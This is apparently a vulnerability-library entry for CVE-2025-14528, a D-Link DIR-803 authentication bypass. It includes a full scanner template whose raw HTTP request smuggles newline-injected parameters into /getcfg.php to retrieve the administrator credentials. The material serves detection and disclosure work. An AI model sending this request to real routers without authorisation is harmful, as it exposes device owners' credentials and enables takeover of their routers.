/Vulnerability Library

D-Link DIR-803 - Authentication Bypass

CVE-2025-14528
Verified

Description

An authentication bypass vulnerability exists in D-Link DIR-803 routers (firmware A1 1.04 and earlier). By manipulating the AUTHORIZED_GROUP parameter in /getcfg.php via newline injection, an attacker can retrieve XML configuration containing administrator credentials without authentication.

Severity

High

CVSS Score

5.3

Exploit Probability

4%

Published Date

February 10, 2026

Template Author

dhiyaneshdk

CVE-2025-14528.yaml
id: CVE-2025-14528

info:
  name: D-Link DIR-803 - Authentication Bypass
  author: DhiyaneshDk
  severity: high
  description: |
    An authentication bypass vulnerability exists in D-Link DIR-803 routers (firmware A1 1.04 and earlier). By manipulating the AUTHORIZED_GROUP parameter in /getcfg.php via newline injection, an attacker can retrieve XML configuration containing administrator credentials without authentication.
  impact: |
    Remote attackers can disclose sensitive information, potentially compromising device confidentiality.
  remediation: |
    Upgrade to the latest supported version or replace the device as it is no longer maintained.
  reference:
    - https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/D-Link/vuln-2/DIR-803%20Authentication%20Bypass.md
    - https://vuldb.com/?id.335869
    - https://nvd.nist.gov/vuln/detail/CVE-2025-14528
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-14528
    epss-score: 0.03559
    epss-percentile: 0.87936
    cwe-id: CWE-200
  metadata:
    max-request: 1
    verified: true
    fofa-query: app="D_Link-DIR-803"
  tags: cve,cve2025,d-link,dir,auth-bypass,disclosure,vkev

http:
  - raw:
      - |
        GET /getcfg.php?a=%0A_POST_SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1' HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<entry>"
          - "<account>"
          - "<group>"
        condition: and

      - type: word
        part: content_type
        words:
          - "text/xml"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008b1408039b2ee9e8f6758f7fdb474e32ecee91fb1ba1d6fcf22dc5c947da75e7022067d137b204cc003e8b26a60b59cd2a30993a1ed3c8052db22193212452ccdb74:922c64590222798bb761d5b6d8e72950
5.3Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVE ID:
cve-2025-14528
CWE ID:
cwe-200

References

https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/D-Link/vuln-2/DIR-803%20Authentication%20Bypass.mdhttps://vuldb.com/?id.335869https://nvd.nist.gov/vuln/detail/CVE-2025-14528

Remediation Steps

Upgrade to the latest supported version or replace the device as it is no longer maintained.